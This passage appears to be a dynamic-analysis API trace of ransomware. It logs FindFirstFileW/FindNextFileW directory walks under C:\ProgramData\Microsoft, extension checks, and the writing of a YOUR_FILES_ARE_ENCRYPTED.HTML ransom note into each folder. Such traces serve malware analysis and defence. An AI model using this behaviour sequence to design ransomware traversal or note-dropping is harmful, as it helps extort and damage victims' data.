lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\*" [0156.900] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x263aa572, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x263aa572, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x263aa572, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 
[0156.901] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x263aa572, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x263aa572, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x263aa572, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.901] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x263aa572, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x263aa572, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x263aa572, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0156.902] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0156.902] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 71 [0156.902] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\media player\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0156.902] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0156.905] CloseHandle (hObject=0x598) returned 1 [0156.906] GetProcessHeap () returned 0x270000 
[0156.907] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.907] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe5119f42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe5119f42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MF", cAlternateFileName="")) returned 1 [0156.907] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF") returned 31 [0156.907] GetProcessHeap () returned 0x270000 [0156.907] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0156.907] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\MF" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF") returned="\\\\?\\C:\\ProgramData\\Microsoft\\MF" [0156.907] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*" [0156.907] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe5119f42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe5119f42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0156.908] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, 
ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe5119f42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe5119f42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.908] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d7a1c3, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d7a1c3, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x0, dwReserved1=0x60, cFileName="Active.GRL", cAlternateFileName="")) returned 1 [0156.908] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL") returned 42 [0156.908] lstrcmpW (lpString1="Active.GRL", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.908] PathFindExtensionW (pszPath="Active.GRL") returned=".GRL" [0156.908] lstrlenW (lpString=".GRL") returned 4 [0156.908] PathFindExtensionW (pszPath="Active.GRL") returned=".GRL" [0156.908] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d7a1c3, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d7a1c3, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x0, dwReserved1=0x60, cFileName="Pending.GRL", cAlternateFileName="")) returned 1 [0156.908] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL") returned 43 [0156.908] lstrcmpW (lpString1="Pending.GRL", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.908] PathFindExtensionW (pszPath="Pending.GRL") returned=".GRL" [0156.908] lstrlenW (lpString=".GRL") returned 4 [0156.908] PathFindExtensionW (pszPath="Pending.GRL") returned=".GRL" [0156.908] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d7a1c3, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d7a1c3, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x0, dwReserved1=0x60, cFileName="Pending.GRL", cAlternateFileName="")) returned 0 [0156.908] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0156.908] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 61 [0156.909] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\mf\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0156.909] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0156.911] CloseHandle (hObject=0x598) returned 1 [0156.912] GetProcessHeap () returned 0x270000 [0156.913] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.913] FindNextFileW (in: hFindFile=0x42f3100, 
lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2c774c50, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x2c774c50, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x2c774c50, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="NetFramework", cAlternateFileName="NETFRA~1")) returned 1 [0156.913] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework") returned 41 [0156.913] GetProcessHeap () returned 0x270000 [0156.913] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0156.913] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework") returned="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework" [0156.913] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\*" [0156.913] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2c774c50, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x2c774c50, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x2c774c50, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0156.914] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2c774c50, 
ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x2c774c50, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x2c774c50, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.914] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2c774c50, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x2c774c50, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x2c774c50, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="BreadcrumbStore", cAlternateFileName="BREADC~1")) returned 1 [0156.914] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore") returned 57 [0156.914] GetProcessHeap () returned 0x270000 [0156.914] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0156.914] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore") returned="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore" [0156.914] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\*" [0156.915] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2c774c50, 
ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x2c774c50, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x2c774c50, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0156.915] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2c774c50, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x2c774c50, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x2c774c50, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.915] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2c774c50, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x2c774c50, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x2c774c50, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0156.915] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.915] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0156.915] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\netframework\\breadcrumbstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0156.916] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0156.918] CloseHandle (hObject=0x4a8) returned 1 [0156.918] GetProcessHeap () returned 0x270000 [0156.919] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0156.919] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2c774c50, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x2c774c50, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x2c774c50, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="BreadcrumbStore", cAlternateFileName="BREADC~1")) returned 0 [0156.919] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0156.919] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 71 [0156.920] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\netframework\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0156.920] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0156.922] CloseHandle (hObject=0x598) returned 1 [0156.922] GetProcessHeap () returned 
0x270000 [0156.923] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.923] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f2fe55, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9f2fe55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Network", cAlternateFileName="")) returned 1 [0156.923] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network") returned 36 [0156.923] GetProcessHeap () returned 0x270000 [0156.923] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0156.923] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Network" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network" [0156.923] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*" [0156.923] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f2fe55, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9f2fe55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0156.924] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: 
lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f2fe55, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9f2fe55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.924] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f2fe55, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x63053aed, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0156.924] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections") returned 48 [0156.924] GetProcessHeap () returned 0x270000 [0156.924] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0156.924] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections" [0156.924] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\*" [0156.924] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f2fe55, 
ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f2fe55, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x63053aed, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0156.924] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f2fe55, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x63053aed, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.924] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f2fe55, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x63053aed, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0156.924] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.924] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 78 [0156.925] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\network\\connections\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) 
returned 0x4a8 [0156.925] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0156.927] CloseHandle (hObject=0x4a8) returned 1 [0156.928] GetProcessHeap () returned 0x270000 [0156.928] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0156.929] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x5ca238d5, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ca238d5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Downloader", cAlternateFileName="DOWNLO~1")) returned 1 [0156.929] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader") returned 47 [0156.929] GetProcessHeap () returned 0x270000 [0156.929] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0156.929] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader" [0156.929] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*" [0156.929] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, 
